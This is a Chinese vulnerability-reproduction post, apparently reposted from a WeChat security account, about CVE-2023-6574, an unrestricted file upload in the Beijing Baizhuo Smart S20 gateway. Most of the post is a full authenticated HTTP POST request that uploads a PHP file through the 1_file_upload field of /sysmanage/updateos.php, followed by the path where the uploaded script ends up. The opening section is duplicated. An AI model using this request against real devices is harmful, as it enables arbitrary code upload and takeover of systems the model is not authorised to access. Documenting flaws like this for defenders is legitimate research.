免责声明:该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试,若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。
漏洞名称
北京百绰智能S20高达20231120 HTTP POST请求/SYSMANAGE/UPDATEOS.PHP 1_FILE_UPLOAD无限制上传(CVE-2023-6574)
漏洞评分
6.3(中危)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C :L/I:L/A:L/E:P/RL:X/RC:R
漏洞详情
北京百卓智能网络S20发现漏洞,级别为严重。受此问题影响的是组件HTTP POST Request Handler的文件/sysmanage/updateos.php的未知代码块。对参数1_file_upload的操作导致上传不受限制。攻击可以远程发起。
影响产品
Smart S20==20231120
漏洞复现
1.系统登录页面:
漏洞名称
北京百绰智能S20高达20231120 HTTP POST请求/SYSMANAGE/UPDATEOS.PHP 1_FILE_UPLOAD无限制上传(CVE-2023-6574)
漏洞评分
6.3(中危)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C :L/I:L/A:L/E:P/RL:X/RC:R
漏洞详情
北京百卓智能网络S20发现漏洞,级别为严重。受此问题影响的是组件HTTP POST Request Handler的文件/sysmanage/updateos.php的未知代码块。对参数1_file_upload的操作导致上传不受限制。攻击可以远程发起。
影响产品
Smart S20==20231120
漏洞复现
1.系统登录页面:
3.漏洞路径
漏洞利用需要权限
/sysmanage/updateos.php?
POST
/sysmanage/updateos.php?
HTTP/1.1
Host
: 127.0.0.1:8443
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate, br
Content-Type
: multipart/form-data; boundary=---------------------------76347121319860467791763254962
Content-Length
: 3623
Origin
: https://127.0.0.1:8443
Connection
: keep-alive
Referer
: https://127.0.0.1:8443/sysmanage/updateos.php
Cookie
: PHPSESSID=9fd20e6cc3b331a02ecd0e303e10730a
Upgrade-Insecure-Requests
: 1
Sec-Fetch-Dest
: document
Sec-Fetch-Mode
: navigate
Sec-Fetch-Site
: same-origin
Sec-Fetch-User
: ?1
-----------------------------
76347121319860467791763254962
Content-Disposition: form-
data
; name=
"1_file_upload"
; filename=
"test.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
-----------------------------
76347121319860467791763254962
Content-Disposition: form-
data
; name=
"id_type"
1
-----------------------------
76347121319860467791763254962
Content-Disposition: form-
data
; name=
"1_ck"
1
_radhttp
-----------------------------
76347121319860467791763254962
Content-Disposition: form-
data
; name=
"mode"
set
-----------------------------
76347121319860467791763254962
--
3、脚本存放路径/home/test.php
修复建议
补丁文件
暂无
其他修复方法
目前官方已有可更新版本,建议受影响用户升级至最新版本
缓解方案
无
原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】北京百绰智能S20高达20231120(CVE-2023-6574)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论